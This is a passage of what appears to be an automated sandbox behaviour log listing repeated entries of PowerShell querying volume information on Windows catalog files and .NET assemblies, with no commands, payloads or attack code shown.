                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
